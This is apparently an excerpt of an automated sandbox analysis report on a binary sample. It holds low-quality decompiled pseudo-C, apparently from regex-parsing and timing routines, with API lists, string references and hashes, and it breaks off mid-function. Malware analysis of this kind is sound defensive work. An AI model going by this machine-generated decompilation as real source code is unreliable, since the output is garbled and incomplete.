				_t320 = __ecx;
				if(_t229 != 0x1b) {
					__eflags = _t229 - 0x74;
					if(_t229 != 0x74) {
						__eflags = _t229 - 0x75;
						if(_t229 != 0x75) {
							__eflags = _t229 - 0x76;
							if(_t229 == 0x76) {
								_push(1);
								L00415334();
								_push(0x41c994);
								L004152E6();
								 *(_t418 + 8) = 0x82;
								__eflags =  *(__ecx + 0x6c);
								if( *(__ecx + 0x6c) != 0) {
									 *(_t418 + 8) = 0x83;
								}
								__eflags =  *(_t320 + 0x70);
								if( *(_t320 + 0x70) != 0) {
									_t149 = _t418 + 8;
									 *_t149 =  *(_t418 + 8) | 0x00000004;
									__eflags =  *_t149;
								}
								__eflags =  *(_t320 + 0x74);
								if( *(_t320 + 0x74) != 0) {
									_t152 = _t418 + 8;
									 *_t152 =  *(_t418 + 8) | 0x00000008;
									__eflags =  *_t152;
								}
								_t401 =  *0x417298;
								 *(_t418 - 0x18) =  *_t401();
								asm("fild dword [ebp-0x18]");
								 *(_t418 - 0x14) =  *(_t320 + 0x60);
								 *((long long*)(_t418 - 0x58)) = _t430;
								 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
								 *0x417230(0);
								 *0x417234( *(_t418 - 0x14), strlen( *(_t418 - 0x14)));
								 *(_t418 - 4) = 0x10;
								E00402534(_t418 - 0x198);
								 *((intOrPtr*)(_t418 - 0x198)) = 0x417660;
								 *(_t418 - 4) = 0x12;
								 *0x417230(1, _t418 - 0x28,  *(_t418 + 8), 0);
								 *((intOrPtr*)(_t418 - 0x3c)) = 0;
								 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
								 *((intOrPtr*)(_t418 - 0x38)) = 0;
								 *((intOrPtr*)(_t418 - 0x34)) = 0;
								 *(_t418 + 8) =  *(_t320 + 0x68);
								 *(_t418 - 4) = 0x13;
								 *((char*)(_t418 - 0x74)) =  *((intOrPtr*)(_t418 + 0xb));
								 *0x417230(0);
								 *0x417234( *(_t418 + 8), strlen( *(_t418 + 8)));
								 *(_t418 - 4) = 0x14;
								_t247 = E004028AC(_t418 - 0x198, _t418 - 0x74, _t418 - 0x40, 0, 0, 0xffffffff);
								__eflags = _t247;
								 *(_t418 - 0x44) = _t247;
								if(_t247 > 0) {
									 *(_t418 + 8) = 0;
									 *(_t418 - 0x14) = _t247;
									do {
										_t253 =  *((intOrPtr*)(_t418 - 0x3c)) +  *(_t418 + 8);
										 *(_t418 - 0x18) = _t253;
										 *((char*)(_t418 - 0x8c)) =  *_t253;
										 *0x417230(0);
										_t256 =  *0x41723c; // 0x6cd05df0
										 *0x417240( *(_t418 - 0x18), 0,  *_t256);
										_t258 =  *(_t418 - 0x88);
										 *(_t418 - 4) = 0x15;
										__eflags = _t258;
										if(_t258 == 0) {
											_t258 =  *0x417238; // 0x6cd06082
										}
										L0041532E();
										L0041532E();
										 *(_t418 - 4) = 0x14;
										 *0x417230(1, "\r\n---------------------------------------------\r\n", _t258);
										 *(_t418 + 8) =  &(( *(_t418 + 8))[0x10]);
										_t207 = _t418 - 0x14;
										 *_t207 =  *(_t418 - 0x14) - 1;
										__eflags =  *_t207;
									} while ( *_t207 != 0);
								}
								 *(_t418 + 8) =  *_t401();
								_t335 = _t418 - 0x10;
								asm("fild dword [ebp+0x8]");
								 *((long long*)(_t418 - 0x50)) = _t430;
								L004152EC();
								 *(_t418 - 4) = 0x16;
								 *_t421 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x58));
								L00415328();
								L00415322();
								L0041531C();
								L00415334();
								 *(_t418 - 4) = 0x14;
								L00415214();
								 *(_t418 - 4) = 0x13;
								 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x10), _t418 - 0x10, 0x41c128, _t335, _t335,  *(_t418 - 0x44));
								 *(_t418 - 4) = 0x12;
								E00402408(_t418 - 0x40);
								_t224 = _t418 - 4;
								 *_t224 =  *(_t418 - 4) | 0xffffffff;
								__eflags =  *_t224;
								_t342 = _t418 - 0x198;
								goto L45;
							}
						} else {
							_push(1);
							L00415334();
							_push(0x41c994);
							L004152E6();
							 *(_t418 + 8) = 0x82;
							__eflags =  *(__ecx + 0x6c);
							if( *(__ecx + 0x6c) != 0) {
								 *(_t418 + 8) = 0x83;
							}
							__eflags =  *(_t320 + 0x70);
							if( *(_t320 + 0x70) != 0) {
								_t85 = _t418 + 8;
								 *_t85 =  *(_t418 + 8) | 0x00000004;
								__eflags =  *_t85;
							}
							__eflags =  *(_t320 + 0x74);
							if(__eflags != 0) {
								_t88 = _t418 + 8;
								 *_t88 =  *(_t418 + 8) | 0x00000008;
								__eflags =  *_t88;
							}
							_t414 =  *0x417298;
							_t261 =  *_t414();
							_t402 =  *(_t320 + 0x78);
							 *(_t418 - 0x18) = _t261;
							asm("fild dword [ebp-0x18]");
							 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
							 *((long long*)(_t418 - 0x48)) = _t430;
							 *0x417230(0);
							 *0x417234(_t402, strlen(_t402));
							_t403 =  *(_t320 + 0x60);
							 *(_t418 - 4) = 8;
							 *((char*)(_t418 - 0x9c)) =  *((intOrPtr*)(_t418 + 0xb));
							 *0x417230(0);
							 *0x417234(_t403, strlen(_t403));
							 *(_t418 - 4) = 9;
							E004025A0(_t418 - 0x144, __eflags);
							 *((intOrPtr*)(_t418 - 0x144)) = 0x417660;
							 *(_t418 - 4) = 0xc;
							 *0x417230(1, _t418 - 0x9c, _t418 - 0x28,  *(_t418 + 8), 0);
							 *(_t418 - 4) = 0xb;
							 *0x417230(1);
							E004023AE(_t418 - 0xcc);
							_t404 =  *(_t320 + 0x68);
							 *(_t418 - 4) = 0xd;
							 *((char*)(_t418 - 0x60)) =  *((intOrPtr*)(_t418 + 0xb));
							 *0x417230(0, _t418 + 0xb);
							 *0x417234(_t404, strlen(_t404));
							_push(0xffffffff);
							_push(0);
							_push(_t418 - 0xcc);
							 *(_t418 - 4) = 0xe;
							_push(_t418 - 0x60);
							_push(_t418 - 0x144);
							_t405 = E00402D2D(_t320, _t404, _t414);
							_t285 =  *(_t418 - 0x5c);
							_t424 = _t421 + 0x14;
							__eflags = _t285;
							if(_t285 == 0) {
								_t285 =  *0x417238; // 0x6cd06082
							}
							L004152E6();
							 *(_t418 - 0x18) =  *_t414(_t285);
							_t365 = _t418 - 0x14;
							asm("fild dword [ebp-0x18]");
							 *((long long*)(_t418 - 0x50)) = _t430;
							L004152EC();
							 *(_t418 - 4) = 0xf;
							 *_t424 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x48));
							L00415328();
							L00415322();
							L0041531C();
							L00415334();
							 *(_t418 - 4) = 0xe;
							L00415214();
							 *(_t418 - 4) = 0xd;
							 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x14), _t418 - 0x14, 0x41c104, _t365, _t365, _t405);
							 *(_t418 - 4) = 0xb;
							E004021A6(_t418 - 0xcc);
							 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
							_t342 = _t418 - 0x144;
							L45:
							_t229 = E00402269(_t342);
						}
					} else {
						_push(1);
						L00415334();
						_push(0x41c994);
						L004152E6();
						E004024EC(_t418 - 0x2c, _t418 + 0xb);
						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
						 *(_t418 - 0x10) = 0x82;
						__eflags =  *(__ecx + 0x6c);
						 *(_t418 - 4) = 0;
						if( *(__ecx + 0x6c) != 0) {
							 *(_t418 - 0x10) = 0x83;
						}
						__eflags =  *(_t320 + 0x70);
						if( *(_t320 + 0x70) != 0) {
							_t11 = _t418 - 0x10;
							 *_t11 =  *(_t418 - 0x10) | 0x00000004;
							__eflags =  *_t11;
						}
						__eflags =  *(_t320 + 0x74);
						if( *(_t320 + 0x74) != 0) {
							_t14 = _t418 - 0x10;
							 *_t14 =  *(_t418 - 0x10) | 0x00000008;
							__eflags =  *_t14;
						}
						_t292 =  *0x417298();
						_t415 =  *(_t320 + 0x60);
						 *(_t418 - 0x18) = _t292;
						asm("fild dword [ebp-0x18]");
						 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
						 *((long long*)(_t418 - 0x50)) = _t430;
						 *0x417230(0);
						 *0x417234(_t415, strlen(_t415));
						 *(_t418 - 4) = 1;
						E00402534(_t418 - 0xf0);
						 *((intOrPtr*)(_t418 - 0xf0)) = 0x417660;
						 *(_t418 - 4) = 3;
						 *0x417230(1, _t418 - 0x40,  *(_t418 - 0x10), 0);
						 *(_t418 - 0x18) =  *(_t418 - 0xe1);
						 *(_t418 - 0x10) = 0;
						_t303 = E00402CEB(_t418 - 0xf0, _t418 - 0x30,  *(_t320 + 0x68));
						_t426 = _t421 + 0xc;
						__eflags = _t303;
						if(_t303 == 0) {
							_t304 = 0x41cbc0;
						} else {
							_t304 = E00402504(_t418 - 0x2c, 0);
						}
						_t380 = 6;
						memcpy(_t418 - 0x7c, _t304, _t380 << 2);
						_t427 = _t426 + 0xc;
						asm("movsw");
						__eflags =  *((char*)(_t418 - 0x74));
						if( *((char*)(_t418 - 0x74)) != 0) {
							_t410 = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *(_t418 - 0x28);
								if( *(_t418 - 0x28) == 0) {
									goto L21;
								}
								_t310 =  *((intOrPtr*)(_t418 - 0x24)) -  *(_t418 - 0x28);
								_t389 = 0x1a;
								asm("cdq");
								__eflags = _t410 - _t310 / _t389;
								if(_t410 < _t310 / _t389) {
									_t312 = _t410;
									asm("cdq");
									__eflags = _t312 %  *(_t418 - 0x18) - 1;
									if(_t312 %  *(_t418 - 0x18) == 1) {
										 *(_t418 - 0x10) =  *(_t418 - 0x10) + 1;
										_push(_t418 - 0x74);
										_t317 =  *(E004022E2(E00402504(_t418 - 0x2c, _t410)) + 4);
										 *(_t418 - 4) = 6;
										__eflags = _t317;
										if(_t317 == 0) {
											_t317 =  *0x417238; // 0x6cd06082
										}
										L0041532E();
										 *(_t418 - 4) = 3;
										 *0x417230(1, _t317);
										_push("\r\n---------------------------------------------\r\n");
										L0041532E();
									}
									_t410 = _t410 + 1;
									continue;
								}
								goto L21;
							}
						}
						L21:
						 *(_t418 - 0x18) =  *0x417298();
						_t382 = _t418 - 0x14;
						asm("fild dword [ebp-0x18]");
						 *((long long*)(_t418 - 0x48)) = _t430;
						L004152EC();
						_push( *(_t418 - 0x10));
						_push(_t382);
						_push(_t382);
						 *(_t418 - 4) = 7;
						 *_t427 =  *((long long*)(_t418 - 0x48)) -  *((long long*)(_t418 - 0x50));
						_push(0x41c128);
						_push(_t418 - 0x14);
						L00415328();
						_push( *(_t418 - 0x14));
						_push(0x3ec);
						L00415322();
						L0041531C();
						_push(0);
						L00415334();
						 *(_t418 - 4) = 3;
						L00415214();
						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
						E00402269(_t418 - 0xf0);
						 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
						_t229 = E00402249();
					}
				} else {
					L00415226();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t418 - 0xc));
				return _t229;
			}

APIs

_EH_prolog.MSVCRT ref: 00401B46
clock.MSVCRT ref: 00401BC4
strlen.MSVCRT ref: 00401BE7

Strings

---------------------------------------------, xrefs: 00401CD4, 004020DE
dvA, xrefs: 00401C34, 00401C37
`vA, xrefs: 0040206B, 00402185
`vA, xrefs: 00401C38, 00401D4C, 00401C3E
>$@, xrefs: 00401B93, 00401D5E
+&@, xrefs: 00401C0F, 00401E41, 00402007
`vA, xrefs: 00401EB8, 00401F5F, 00401EBE

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: H_prologclockstrlen
String ID: ---------------------------------------------$+&@$>$@$`vA$`vA$`vA$dvA
API String ID: 3760762678-3690534125
Opcode ID: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
Instruction ID: 3512c44382567f2ea4b4915ac8f057547d101fd7276799898dd384eece168e15
Opcode Fuzzy Hash: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
Instruction Fuzzy Hash: 4C127131804209EFDF14EFA4CD85BEDBB74BF54304F1440AAF815A7292DBB85A85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A98 Relevance: 16.9, APIs: 8, Strings: 3, Instructions: 360
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00404A98(signed int __ebx) {
				void* _t164;
				intOrPtr _t174;
				intOrPtr _t188;
				signed int _t192;
				intOrPtr _t193;
				signed int _t204;
				intOrPtr _t221;
				intOrPtr _t222;
				intOrPtr _t223;
				intOrPtr _t224;
				void* _t231;
				intOrPtr _t233;
				signed int _t236;
				intOrPtr* _t262;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				void* _t294;
				signed int _t301;
				signed int _t310;
				signed char _t311;
				intOrPtr* _t323;
				signed int* _t329;
				char* _t330;
				intOrPtr _t335;
				char* _t337;
				intOrPtr _t338;
				char* _t339;
				char* _t340;
				intOrPtr _t341;
				void* _t344;

				_t236 = __ebx;
				 *((char*)(_t344 - 0x15)) = 1;
				E004079C9(__ebx + 0x43, _t344 + 0xc,  *((intOrPtr*)(__ebx + 0x47)), _t329);
				 *0x41720c();
				asm("sbb ecx, ecx");
				if(E004090FF( *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4), 0xffffffff) == 0) {
					L4:
					_t323 =  *((intOrPtr*)(_t236 + 0x27));
					 *((intOrPtr*)(_t344 - 0x28)) =  *( *(_t344 + 8));
					 *0x41720c();
					asm("sbb ecx, ecx");
					_t164 = E00406D0A( *((intOrPtr*)(_t344 + 0x10)), _t344 - 0x28,  ~( *(_t323 + 4)) &  *((intOrPtr*)(_t323 + 8)) +  *(_t323 + 4));
					__eflags = _t164 - 0x4b;
					if(_t164 < 0x4b) {
						L7:
						 *((char*)(_t344 - 0x80)) =  *((intOrPtr*)(_t344 + 0x13));
						 *0x417230(0);
						_t330 = "bad extension sequence";
						 *0x417234(_t330, strlen(_t330));
						 *(_t344 - 4) = 0xd;
						E00404FA7(_t344 - 0xb0, _t344 - 0x80);
						_push(0x4196f8);
						_push(_t344 - 0xb0);
						 *((intOrPtr*)(_t344 - 0xb0)) = 0x417698;
						L004153FE();
						while(1) {
							 *0x41720c();
							asm("sbb ecx, ecx");
							_t174 = E00406B23( *((intOrPtr*)(_t344 + 0x10)), _t323,  ~( *( *((intOrPtr*)(_t236 + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x27)) + 8)) +  *( *((intOrPtr*)(_t236 + 0x27)) + 4));
							__eflags = _t174 - 2;
							if(_t174 == 2) {
								goto L16;
							}
							__eflags = _t174;
							if(_t174 == 0) {
								_t341 =  *((intOrPtr*)(_t236 + 0x27));
								 *0x41720c();
								_t287 =  *(_t341 + 4);
								_t221 =  *_t323;
								asm("sbb edx, edx");
								__eflags = ( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) - _t221;
								if(( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) != _t221) {
									_t222 = _t221 + 1;
									__eflags = _t222;
									 *_t323 = _t222;
								}
							}
							_t338 =  *((intOrPtr*)(_t236 + 0x27));
							 *0x41720c();
							_t204 =  *(_t338 + 4);
							asm("sbb ecx, ecx");
							__eflags = ( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) -  *_t323;
							if(( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) !=  *_t323) {
								continue;
							} else {
								 *((char*)(_t344 - 0x90)) =  *((intOrPtr*)(_t344 + 0x13));
								 *0x417230(0);
								_t339 = "Expecting end of comment";
								 *0x417234(_t339, strlen(_t339));
								 *(_t344 - 4) = 0xe;
								E00404FA7(_t344 - 0xcc, _t344 - 0x90);
								 *((intOrPtr*)(_t344 - 0xcc)) = 0x417698;
								L004153FE();
								 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
								 *0x417230(0, _t344 - 0xcc, 0x4196f8);
								_t340 = "bad extension sequence";
								 *0x417234(_t340, strlen(_t340));
								 *(_t344 - 4) = 0xf;
								E00404FA7(_t344 - 0x70, _t344 - 0x48);
								_push(0x4196f8);
								_push(_t344 - 0x70);
								 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
								L004153FE();
								 *_t323 =  *((intOrPtr*)(_t344 - 0x28));
							}
							goto L16;
						}
					} else {
						__eflags = _t164 - 0x4e;
						if(_t164 > 0x4e) {
							goto L7;
						} else {
							_t288 = _t236;
							_t223 = E00404705(_t288,  *(_t344 + 8), 0,  *((intOrPtr*)(_t344 + 0x10)),  *((intOrPtr*)(_t344 + 0x14)));
							__eflags = _t223;
							 *(_t344 - 0x34) = _t288 & 0xffffff00 | __eflags != 0x00000000;
							 *((intOrPtr*)(_t344 - 0x30)) = _t223;
							_t290 =  *_t329;
							 *(_t344 - 4) = 0xc;
							 *_t329 = _t290 + 1;
							_push(_t236 + 4);
							_push(_t223);
							_push(_t290);
							_t224 = E004091BE(__eflags);
							 *((intOrPtr*)(_t344 - 0x1c)) = _t224;
							__eflags = _t224;
							 *((char*)(_t344 - 0x20)) = _t290 & 0xffffff00 | _t224 != 0x00000000;
							E0040BF91(_t344 - 0x14, _t344 - 0x20);
							E00406ED3(_t344 - 0x20);
							 *(_t344 - 0x34) =  *(_t344 - 0x34) & 0x00000000;
							 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
							_t294 = _t344 - 0x34;
							goto L3;
						}
					}
				} else {
					 *0x41720c();
					asm("sbb ecx, ecx");
					_t231 = E00406B23( *((intOrPtr*)(_t344 + 0x10)),  *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4));
					_t352 = _t231 - 2;
					if(_t231 != 2) {
						goto L4;
					} else {
						_t14 =  *_t329 + 1; // 0x1
						 *_t329 = _t14;
						_t301 = __ebx + 4;
						_push(_t301);
						_push(1);
						_push( *_t329);
						_t233 = E00409146(_t301, _t352);
						 *((intOrPtr*)(_t344 - 0x1c)) = _t233;
						 *((char*)(_t344 - 0x20)) = _t301 & 0xffffff00 | _t233 != 0x00000000;
						E0040BF91(_t344 - 0x14, _t344 - 0x20);
						_t294 = _t344 - 0x20;
						L3:
						E00406ED3(_t294);
					}
				}
				L16:
				_t257 =  *((intOrPtr*)(_t344 - 0x10));
				if( *((intOrPtr*)(_t344 - 0x10)) != 0) {
					E00406F41(_t257);
					do {
						_push( *((intOrPtr*)(_t344 + 0x14)));
						_push( *((intOrPtr*)(_t344 + 0x10)));
						_push( *((intOrPtr*)(_t344 - 0x10)));
						_push( *(_t344 + 8));
					} while (E004050B8(_t236) != 0);
					E00406F61( *((intOrPtr*)(_t344 - 0x10)), _t344 - 0x24, _t236 + 4);
					_t325 = _t344 - 0x38;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsb");
					if( *((char*)(_t344 - 0x15)) != 0) {
						_t101 =  *((intOrPtr*)(_t344 - 0x10)) + 8; // 0x8
						if(E00407CC2(_t101) > 2) {
							 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
							 *0x417230(0);
							_t337 = "Too many alternates in conditional subexpression";
							 *0x417234(_t337, strlen(_t337));
							 *(_t344 - 4) = 0x12;
							E00404FA7(_t344 - 0x70, _t344 - 0x48);
							_push(0x4196f8);
							_push(_t344 - 0x70);
							 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
							L004153FE();
						}
					}
					_t262 =  *((intOrPtr*)(_t344 - 0x10));
					if( *(_t344 - 0x38) != 0 &&  *(_t262 + 0x10) == 0) {
						_t192 = E0040507F( *((intOrPtr*)(_t236 + 4)), 0x10d);
						 *(_t344 + 8) = _t192;
						 *(_t344 - 4) = 0x13;
						if(_t192 == 0) {
							_t193 = 0;
							__eflags = 0;
						} else {
							_t193 = E004074E9(_t192,  *((intOrPtr*)(_t344 - 0x37)),  *((intOrPtr*)(_t344 - 0x33)),  *((intOrPtr*)(_t344 - 0x2f)));
						}
						 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
						_t262 =  *((intOrPtr*)(_t344 - 0x10));
						 *((intOrPtr*)(_t236 + 0x4f)) = _t193;
					}
					_t310 =  *(_t262 + 0x10);
					if(_t310 != 0xffffffff) {
						_t335 =  *((intOrPtr*)(_t344 + 0x14));
						_t126 = _t335 + 4; // 0x405058
						_t188 =  *_t126;
						if(_t188 == 0) {
							L31:
							 *(_t344 + 8) =  *(_t344 + 8) & 0x00000000;
							E00407584(_t335, _t325,  *(_t262 + 0x10) + 1, _t344 + 8);
							_t262 =  *((intOrPtr*)(_t344 - 0x10));
						} else {
							_t127 = _t335 + 8; // 0x0
							_t325 =  *_t127 - _t188 >> 2;
							if(_t310 >=  *_t127 - _t188 >> 2) {
								goto L31;
							}
						}
						_t134 = _t335 + 4; // 0x405058
						 *((intOrPtr*)( *_t134 +  *(_t262 + 0x10) * 4)) = _t262;
						_t262 =  *((intOrPtr*)(_t344 - 0x10));
					}
					_t311 =  *(_t344 - 0x4c);
					 *(_t344 - 0x34) = _t311;
					 *((intOrPtr*)(_t344 - 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 - 0x54)))) - _t311;
					 *((intOrPtr*)( *_t262 + 0x34))(_t344 - 0x34);
					 *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x10)))) =  *((intOrPtr*)(_t344 - 0x50));
				}
				 *(_t344 - 0x14) =  *(_t344 - 0x14) & 0x00000000;
				 *(_t344 - 4) =  *(_t344 - 4) | 0xffffffff;
				E00406ED3(_t344 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t344 - 0xc));
				return  *((intOrPtr*)(_t344 - 0x10));
			}

APIs

strlen.MSVCRT ref: 00404BF6
_CxxThrowException.MSVCRT ref: 00404C30
strlen.MSVCRT ref: 00404CC7
_CxxThrowException.MSVCRT ref: 00404D07
strlen.MSVCRT ref: 00404D23

Part of subcall function 00409146: _EH_prolog.MSVCRT ref: 0040914B

_CxxThrowException.MSVCRT(?,004196F8), ref: 00404D54
strlen.MSVCRT ref: 00404E84
_CxxThrowException.MSVCRT(?,004196F8), ref: 00404EB5

Strings

Expecting end of comment, xrefs: 00404CC1, 00404CC6, 00404CCE
bad extension sequence, xrefs: 00404BF0, 00404BF5, 00404BFD, 00404D1D, 00404D22, 00404D2A
Too many alternates in conditional subexpression, xrefs: 00404E7E, 00404E83, 00404E8B

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionThrowstrlen$H_prolog
String ID: Expecting end of comment$Too many alternates in conditional subexpression$bad extension sequence
API String ID: 875129476-4221926769
Opcode ID: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
Instruction ID: 0d6a007eb94e37c954dd8b579f3e195dca48f335e64544f17c8c6cf0d3b22ef3
Opcode Fuzzy Hash: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
Instruction Fuzzy Hash: A6E1A471A0121ADFCF14DF64C890AEEB7B5FF88304F14416EE816A7281DB78AD45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004061BE Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E004061BE(intOrPtr __ecx) {
				signed int _t158;
				signed int _t166;
				signed int _t178;
				signed int _t180;
				signed int _t184;
				signed int _t185;
				void* _t190;
				signed int _t216;
				void* _t237;
				signed int _t265;
				void* _t317;
				signed int _t320;
				signed int _t324;
				void* _t325;
				void* _t329;
				void* _t333;
				signed int _t334;
				char* _t336;
				char* _t337;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t345;

				L004153D0();
				_t341 = _t340 - 0x88;
				_t334 =  *(_t338 + 8);
				 *((intOrPtr*)(_t338 - 0x24)) = __ecx;
				 *0x41720c(_t317, _t333, _t237);
				 *(_t338 + 8) =  *(_t334 + 4);
				 *((intOrPtr*)(_t338 - 0x20)) =  *((intOrPtr*)(__ecx + 0x13));
				 *(_t338 - 0x18) = 0;
				 *(_t338 - 0x14) = 0;
				 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 0;
				while(1) {
					L1:
					 *(_t338 - 0x10) = 0;
					while(1) {
						L2:
						 *0x41720c();
						_t158 =  *(_t334 + 4);
						asm("sbb ecx, ecx");
						if(( ~_t158 &  *((intOrPtr*)(_t334 + 8)) + _t158) ==  *(_t338 + 8)) {
							break;
						}
						 *0x41720c();
						asm("sbb ecx, ecx");
						_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
						_t345 = _t320 - 0x25;
						if(_t345 > 0) {
							__eflags = _t320 - 0x26;
							if(_t320 == 0x26) {
								 *0x41720c();
								_t166 =  *(_t334 + 4);
								asm("sbb ecx, ecx");
								__eflags = ( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) -  *(_t338 + 8);
								if(( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) ==  *(_t338 + 8)) {
									goto L50;
								} else {
									__eflags =  *(_t338 - 0x10);
									if( *(_t338 - 0x10) != 0) {
										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x5c,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
									}
									 *0x41720c();
									 *(_t338 + 8) =  *(_t338 + 8) + 1;
									 *(_t338 - 0x10) = 1;
									 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
									continue;
								}
							} else {
								__eflags = _t320 - 0x27;
								if(__eflags == 0) {
									__eflags =  *(_t338 - 0x10);
									if( *(_t338 - 0x10) != 0) {
										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
									}
									 *0x41720c();
									_t178 =  *(_t338 + 8);
									_t265 = _t178 -  *(_t334 + 4);
									__eflags = _t265;
									 *(_t338 - 0x14) = _t265;
									while(1) {
										 *(_t338 - 0x1c) = _t178;
										 *0x41720c();
										_t180 =  *(_t334 + 4);
										asm("sbb ecx, ecx");
										__eflags = ( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) -  *(_t338 + 8);
										if(( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) ==  *(_t338 + 8)) {
											break;
										}
										 *0x41720c();
										asm("sbb ecx, ecx");
										_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
										__eflags = _t320;
										if(_t320 == 0) {
											_t97 = _t338 + 8;
											 *_t97 =  *(_t338 + 8) + 1;
											__eflags =  *_t97;
											goto L40;
										} else {
											__eflags = _t320 - 0x2c;
											if(_t320 != 0x2c) {
												L40:
												_t178 =  *(_t338 + 8);
												continue;
											}
										}
										break;
									}
									 *0x41720c();
									_t184 =  *(_t338 - 0x1c) -  *(_t338 - 0x14) -  *(_t334 + 4);
									__eflags = _t184;
									 *(_t338 - 0x10) = _t184;
									if(_t184 != 0) {
										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
									}
									_t185 = 0x2c;
									__eflags = _t320 - _t185;
									if(_t320 != _t185) {
										goto L30;
									} else {
										_t272 =  *((intOrPtr*)(_t338 + 0x10));
										 *(_t338 - 0x14) = _t185;
										 *(_t338 - 0x18) = 2;
										_push(_t338 - 0x18);
										_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
										_t190 = _t338 - 0x44;
										goto L29;
									}
								} else {
									if(__eflags <= 0) {
										goto L31;
									} else {
										__eflags = _t320 - 0x2c;
										if(_t320 > 0x2c) {
											goto L31;
										} else {
											__eflags =  *(_t338 - 0x10);
											if( *(_t338 - 0x10) != 0) {
